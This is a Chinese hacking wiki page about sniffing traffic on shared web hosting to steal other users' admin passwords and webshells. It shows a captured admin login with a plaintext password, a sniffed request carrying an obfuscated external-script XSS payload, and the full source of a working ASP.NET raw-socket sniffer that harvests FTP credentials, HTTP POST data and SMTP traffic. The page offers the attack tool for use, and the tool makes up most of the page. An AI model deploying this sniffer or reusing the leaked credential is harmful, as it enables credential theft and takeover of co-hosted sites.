用户工具

站点工具


习科旧站:winsock嗅探虚拟主机黑吃黑拿下他人webshell

原文太啰嗦,不再保留

嗅探数据举例1

同服务器其他网站管理员登陆后台嗅探记录

POST: /Admin/sent.asp HTTP/1.1
Via: 1.0 PROXY
Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG
Referer: http://www.cntansu.com/Admin/sent.asp
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.cntansu.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: zh-cn
UA-CPU: x86
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 13
pass=buqiuren

嗅探数据举例2

同服务器黑客登陆webshell嗅探记录

POST /Admin/sent.asp?Action=plgm&code=<script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46></script> HTTP/1.1
Via: 1.0 PROXY
Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG
Referer: http://www.cntansu.com/Admin/sent.asp?Action=plgm&code=<script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46></script>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.cntansu.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: zh-cn
UA-CPU: x86
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 153

脚本源码及下载

sniffer.aspx
<%@ Page Language="C#" ValidateRequest="false" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Collections" %>
<%@ Import Namespace="System.Text" %>
<%@ Import Namespace="System.Net.NetworkInformation" %>
<%@ Import Namespace="System.Threading" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>ASPX服务器Web嗅探工具</title>
</head>
<body>
<script runat="server">
static private Socket mainSocket;//截获所有传入的数据包
private static byte[] byteData = new byte[2048];
private static bool bContinueCapturing = true;//检查数据包是否被捕获的标志
static int stoppackes = 0;
static int port = 0;
static string strIP = null;
static long packets = 0;
static System.IO.FileStream wfs;
static string logfile =null;
static PacketCaptureWriter pktwt;
static string keyword;
static DateTime stoptime = System.DateTime.Now.AddYears(-8);
static Thread th;
static int minisizepacket=0;
static string proException = null;
static Boolean logNextPacket = true;
static Boolean my_s_ftp= false;
static Boolean my_s_http_post = true;
static Boolean my_s_smtp = false;
protected void Page_Load(object sender, EventArgs e)
    {
        if (logfile == null)
        {
            logfile = Server.MapPath("w" + System.DateTime.Now.ToFileTime() + ".log");
        }
        if (stoptime.Year == (System.DateTime.Now.Year - 8))
        {
            System.DateTime nextDay = System.DateTime.Now.AddDays(1);
            stoptime = nextDay;
        }
        IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));
        if (HosyEntry.AddressList.Length > 0)
        {
            foreach (IPAddress ip in HosyEntry.AddressList)
            {
                ddlist.Items.Add(ip.ToString());
            }
        }
        //如不是点击Starts按钮,则输出已经设置过的参数
        if (Request.Form["Starts"] == null)
        {
            this.ddlist.SelectedValue = strIP;
            this.txtport.Text = port.ToString();
            this.txtMinisize.Text = minisizepacket.ToString();
            this.txtkeywords.Text = keyword;
            this.txtlogfile.Text = logfile;
            this.txtpackets.Text = stoptime.ToString();
            this.s_ftp.Checked = my_s_ftp;
            this.s_http_post.Checked = my_s_http_post;
            this.s_smtp.Checked = my_s_smtp;
        }
        if (th != null )
        {
            this.Lb_msg.Text = System.DateTime.Now.ToString()+" 结果:<b>" + th.ThreadState.ToString() +"</b> Packets: "+packets.ToString();
        }
        else
        {
            this.Lb_msg.Text = "嗅探尚未开始...";
        }
        if (Request.Form["Starts"] != null || th != null)
        {
            this.Starts.Enabled = false;
        }
        else
        {
            this.Starts.Enabled = true;
        }
        Lb_msg2.Text = proException; //错误信息
    }
    protected void Refresh_Click(object sender, EventArgs e)
    {
    }
    protected void Stop_Click(object sender, EventArgs e)
    {
        packets = stoppackes;
        //stoptime = System.DateTime.Now;
        proException += "<br>上次终止时间为" + System.DateTime.Now.ToString();
        bContinueCapturing = false;

        if (th != null)
        {
            th.Abort();
            th = null; 
        }
        try
        {
            wfs.Close();
            mainSocket.Close();
        }
        catch (Exception ex)
        {
        }
    }
    protected void Pagestart()
    {
        //记录设置过的参数
        strIP = ddlist.SelectedValue;
        port = Int32.Parse(txtport.Text);
        stoptime = Convert.ToDateTime( txtpackets.Text);
        logfile = this.txtlogfile.Text;
        keyword = txtkeywords.Text;
        minisizepacket = Int32.Parse(txtMinisize.Text);
        my_s_ftp = this.s_ftp.Checked;
        my_s_http_post = this.s_http_post.Checked;
        my_s_smtp = this.s_smtp.Checked;
        wfs = System.IO.File.Create(logfile);
        pktwt = new PacketCaptureWriter(wfs, LinkLayerType.RawIP);
        bContinueCapturing = true;
        packets = 0;
        Start();
    }
    private static void Start()
    {
        byte[] byTrue = new byte[4] { 1, 0, 0, 0 };
        byte[] byOut = new byte[4] { 1, 0, 0, 0 };
        try
        {
            bContinueCapturing = true;
            mainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
            mainSocket.Bind(new IPEndPoint(IPAddress.Parse(strIP), 0));
            mainSocket.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, true);
            mainSocket.IOControl(IOControlCode.ReceiveAll, byTrue, byOut);
        }
        catch (Exception ex)
        {
            proException += ex.ToString()+"<BR>"; //静态方法可以访问静态变量proException
        }
        byteData = new byte[2048];
        while (System.DateTime.Now <= stoptime)
        {
            ParseData(byteData, mainSocket.Receive(byteData));
        }
        bContinueCapturing = false;
        wfs.Close();
        mainSocket.Close();
    }
    protected void Start_Click(object sender, EventArgs e)
    {
        if (this.txtlogfile.Text == "" || txtpackets.Text.Length < 1 || txtport.Text == "") return;
        th = new Thread(new ThreadStart(Pagestart));
        th.Start();
        //Session["workthread"] = th;
        this.Lb_msg.Text = "\r\n嗅探中...";
    }

    public static ushort Get2Bytes(byte[] ptr, int Index, int Type)
    {
        ushort u = 0;
        if (Type == 0)
        {
            u = (ushort)ptr[Index++];
            u *= 256;
            u += (ushort)ptr[Index++];
        }
        else if (Type == 1)
        {
            u = (ushort)ptr[++Index];
            u *= 256; Index--;
            u += (ushort)ptr[Index++]; Index++;
        }
        return u;
    }
    private static void ParseData(byte[] byteData, int nReceived)
    {
        try
        {
            byte[] nbyte = new byte[nReceived];
            Array.Copy(byteData, nbyte, nReceived);
            if ((int)nbyte[9] == 6)
            {
                int sport = Get2Bytes(nbyte,  20,0);
                int dport = Get2Bytes(nbyte,  22,0);
                String datas=Encoding.Default.GetString(nbyte);
                Boolean logIt=false;
                if (my_s_ftp)
                {
                    if ((sport == 21 || dport == 21) &&
                        (datas.IndexOf("USER ") >= 0 || datas.IndexOf("PASS ") >= 0)
                        )
                    {
                       logIt =true;                    
                    }
                }
                if (!logIt && my_s_http_post)
                {
                    if(logNextPacket){
                        logIt =true; 
                        logNextPacket=false;
                    }
                    if (!logIt && datas.IndexOf("POST ")>=0)
                    {
                       logIt =true; 
                       logNextPacket=true;
                    }
                }
                if (!logIt && my_s_smtp && (dport == 25 || sport == 25))
                {
                     logIt =true; 
                }
                //判断端口和关键字
                if (!logIt && (dport == port || sport == port))
                {
                    if (nReceived > minisizepacket)
                    {
                        if (keyword != "")
                        {
                            if (datas.IndexOf(keyword) >= 0)
                            {
                                logIt =true; 
                            }
                        }
                        else
                        {
                            logIt =true; 
                        }
                    }
                }
                if(logIt){
                         PacketCapture pkt = new PacketCapture(nbyte, nReceived);
                            pktwt.Write(pkt);
                            packets++;
                }   
            }
        }
        catch { }
    }
    public struct UnixTime
    {
        public static readonly DateTime MinDateTime = new DateTime(1970, 1, 1, 0, 0, 0);
        public static readonly DateTime MaxDateTime = new DateTime(2038, 1, 19, 3, 14, 7);
        private readonly int _Value;
        public UnixTime(int value)
        {
            if (value < 0)
                throw new ArgumentOutOfRangeException("value");
            _Value = value;
        }
        public int Value
        {
            get { return _Value; }
        }
        public DateTime ToDateTime()
        {
            const long START = 621355968000000000; //1970-1-1 00:00:00
            return new DateTime(START + (_Value * (long)10000000)).ToLocalTime();
        }
        public static UnixTime FromDateTime(DateTime dateTime)
        {
            if (dateTime < MinDateTime || dateTime > MaxDateTime)
                throw new ArgumentOutOfRangeException("dateTime");
            TimeSpan span = dateTime.Subtract(MinDateTime);
            return new UnixTime((int)span.TotalSeconds);
        }
        public override string ToString()
        {
            return ToDateTime().ToString();
        }
    }
    public enum LinkLayerType : uint
    {
        Null = 0,
        Ethernet = 1,
        RawIP = 101,
        User0 = 147,
        User1 = 148,
        User2 = 149,
        User3 = 150,
        User4 = 151,
        User5 = 152,
        User6 = 153,
        User7 = 154,
        User8 = 155,
        User9 = 156,
        User10 = 157,
        User11 = 158,
        User12 = 159,
        User13 = 160,
        User14 = 161,
        User15 = 162,
    }
    public sealed class PacketCaptureWriter
    {
        #region Fields
        private const uint MAGIC = 0xA1B2C3D4;
        private readonly Stream _BaseStream;
        private readonly LinkLayerType _LinkLayerType;
        private readonly int _MaxPacketLength;
        private readonly BinaryWriter m_Writer;
        private bool m_ExistHeader = false;
        private int _TimeZone;
        private int _CaptureTimestamp;
        #endregion
        #region Constructors
        public PacketCaptureWriter(
            Stream baseStream, LinkLayerType linkLayerType,
            int maxPacketLength, int captureTimestamp)
        {
            if (baseStream == null) throw new ArgumentNullException("baseStream");
            if (maxPacketLength < 0) throw new ArgumentOutOfRangeException("maxPacketLength");
            if (!baseStream.CanWrite) throw new ArgumentException("Cant'Wirte Stream");
            _BaseStream = baseStream;
            _LinkLayerType = linkLayerType;
            _MaxPacketLength = maxPacketLength;
            _CaptureTimestamp = captureTimestamp;
            m_Writer = new BinaryWriter(_BaseStream);
        }
        public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType, int captureTimestamp)
            : this(baseStream, linkLayerType, 0xFFFF, captureTimestamp)
        {
        }
        public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType)
            : this(baseStream, linkLayerType, 0xFFFF, UnixTime.FromDateTime(DateTime.Now).Value)
        {
        }
        #endregion
        #region Properties
        public short VersionMajor
        {
            get { return 2; }
        }
        public short VersionMinjor
        {
            get { return 4; }
        }
        public int TimeZone
        {
            get { return _TimeZone; }
            set { _TimeZone = value; }
        }
        public int CaptureTimestamp
        {
            get { return _CaptureTimestamp; }
            set { _CaptureTimestamp = value; }
        }

        public Stream BaseStream
        {
            get { return _BaseStream; }
        }
        public LinkLayerType LinkLaterType
        {
            get { return _LinkLayerType; }
        }
        public int MaxPacketLength
        {
            get { return _MaxPacketLength; }
        }
        #endregion
        public void Write(PacketCapture packet)
        {
            CheckHeader();
            m_Writer.Write(packet.Timestamp.Value);
            m_Writer.Write(packet.Millseconds);
            m_Writer.Write(packet.Packet.Count);
            m_Writer.Write(packet.RawLength);
            m_Writer.Write(packet.Packet.Array, packet.Packet.Offset, packet.Packet.Count);
        }
        public void Flush()
        {
            BaseStream.Flush();
        }
        private void CheckHeader()
        {
            if (!m_ExistHeader)
            {
                m_Writer.Write(MAGIC);
                m_Writer.Write(VersionMajor);
                m_Writer.Write(VersionMinjor);
                m_Writer.Write(TimeZone);
                m_Writer.Write(CaptureTimestamp);
                m_Writer.Write(MaxPacketLength);
                m_Writer.Write((uint)LinkLaterType);
                m_ExistHeader = true;
            }
        }
    }
    public sealed class PacketCapture
    {
        private readonly UnixTime _Timestamp;
        private readonly ArraySegment<byte> _Packet;
        private readonly int _RawLength;
        private readonly int _Millseconds;
        public PacketCapture(ArraySegment<byte> packet, int rawLength, UnixTime timestamp, int millseconds)
        {
            if (packet.Count > rawLength)
                throw new ArgumentException("Length Error", "rawLength");
            _Packet = packet;
            _Timestamp = timestamp;
            _RawLength = rawLength;
            _Millseconds = millseconds;
        }
        public PacketCapture(ArraySegment<byte> packet, int rawLength, DateTime timestamp)
            : this(packet, rawLength, UnixTime.FromDateTime(timestamp), 0)
        {
        }
        public PacketCapture(ArraySegment<byte> packet, int rawLength)
            : this(packet, rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
        {
        }
        public PacketCapture(ArraySegment<byte> packet)
            : this(packet, packet.Count)
        {
        }
        public PacketCapture(byte[] packetData, int offset, int count, int rawLength, UnixTime timestamp, int millseconds)
            : this(new ArraySegment<byte>(packetData, offset, count), rawLength, timestamp, millseconds)
        {
        }
        public PacketCapture(byte[] packetData, int offset, int count, int rawLength, DateTime timestamp)
            : this(new ArraySegment<byte>(packetData, offset, count), rawLength, UnixTime.FromDateTime(timestamp), 0)
        {
        }
        public PacketCapture(byte[] packetData, int rawLength, UnixTime timestamp, int millseconds)
            : this(new ArraySegment<byte>(packetData), rawLength, timestamp, millseconds)
        {
        }
        public PacketCapture(byte[] packetData, int rawLength, DateTime timestamp)
            : this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(timestamp), 0)
        {
        }
        public PacketCapture(byte[] packetData, int rawLength)
            : this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
        {
        }
        public PacketCapture(byte[] packetData)
            : this(packetData, packetData.Length)
        {
        }
        public ArraySegment<byte> Packet
        {
            get { return _Packet; }
        }
        public UnixTime Timestamp
        {
            get { return _Timestamp; }
        }
        public int Millseconds
        {
            get { return _Millseconds; }
        }
        public int RawLength
        {
            get { return _RawLength; }
        }
    }
</script>
<style type="text/css">
<!--
a {color: #FF0000;text-decoration: none}
#tt {vertical-align: middle;font-size: 12pt;text-align: center;}
#Ct_2 {padding-left:30px;font-size: 10pt;color: #336699;vertical-align: middle;text-align: left;background-color: aliceblue;border-width: 1px;border-style: solid;border-color: -moz-use-text-color;padding-bottom:10px;}
-->
</style>
<form id="form1" runat="server">
<div id="tt"><b>&#65;&#83;&#80;&#88;&#26381;&#21153;&#22120;&#87;&#69;&#66;&#21957;&#25506;&#24037;&#20855;</b>&#32;&#32;&#32;&#32;&#66;&#121;&#65306;<font color=green><a href="javascript:location.href=String.fromCharCode(104,116,116,112,58,47,47,110,97,110,97,46,98,108,97,99,107,98,97,112,46,111,114,103)">&#74;&#117;&#108;&#105;&#101;&#116;</a></font><br /><br /></div>
<div id="Ct_2" ><table width="100%" ><tr >
<td width="10%">嗅探ip:</td>
<td><asp:DropDownList ID="ddlist" runat="server" width="90%"></asp:DropDownList></td>
</tr><tr >
<td width="10%">自动嗅探: </td>
<td>FTP密码:		<asp:CheckBox ID="s_ftp" runat="server" Checked /><br />
HTTP Post数据:		<asp:CheckBox ID="s_http_post" runat="server" /><br />
Smtp数据:		<asp:CheckBox ID="s_smtp" runat="server" /></td>
</tr><tr>
<td>过滤端口:</td>
<td><asp:TextBox ID="txtport" Text="0"  width="90%" runat="server"></asp:TextBox></td>
</tr><tr>
<td>捕获数据包大小下限:</td>
<td><asp:TextBox ID="txtMinisize" Text="0"  width="90%" runat="server" ></asp:TextBox></td>
</tr><tr>
<td>捕获关键字:</td>
<td><asp:TextBox ID="txtkeywords" runat="server"   width="90%" Text=""></asp:TextBox></td>
</tr><tr>
<td>记录文件:</td>
<td><asp:TextBox ID="txtlogfile" runat="server"   width="90%" Text="log.log" ></asp:TextBox></td>
</tr><tr>
<td>终止时间:</td>
<td><asp:TextBox ID="txtpackets" runat="server"  width="90%" Text="300"></asp:TextBox></td>
</tr><tr>
<td>控制:</td>
<td width="90%" ><asp:Button ID="Starts" runat="server" OnClick="Start_Click" Text="开始嗅探" />
<asp:Button ID="Button1" runat="server" OnClick="Stop_Click" Text="终止嗅探" />
<asp:Button ID="Button_ref" runat="server" OnClick="Refresh_Click" Text="刷新重置" /><br /></td>
</tr><tr>
<td>状态:</td>
<td width="90%"><div id="s"><asp:Label ID="Lb_msg" runat="server" Text=""></div></asp:Label></td>
</tr><tr>
<td>                	  </td>
<td width="90%"><div id="s"><asp:Label ID="Lb_msg2" runat="server" Text=""></div></asp:Label></td>
</tr></table></div><br /><br /></form>
</body></html>
</aspx>
你需要登录发表评论。
习科旧站/winsock嗅探虚拟主机黑吃黑拿下他人webshell.txt · 最后更改: 2020/05/16 19:19 (外部编辑)

页面工具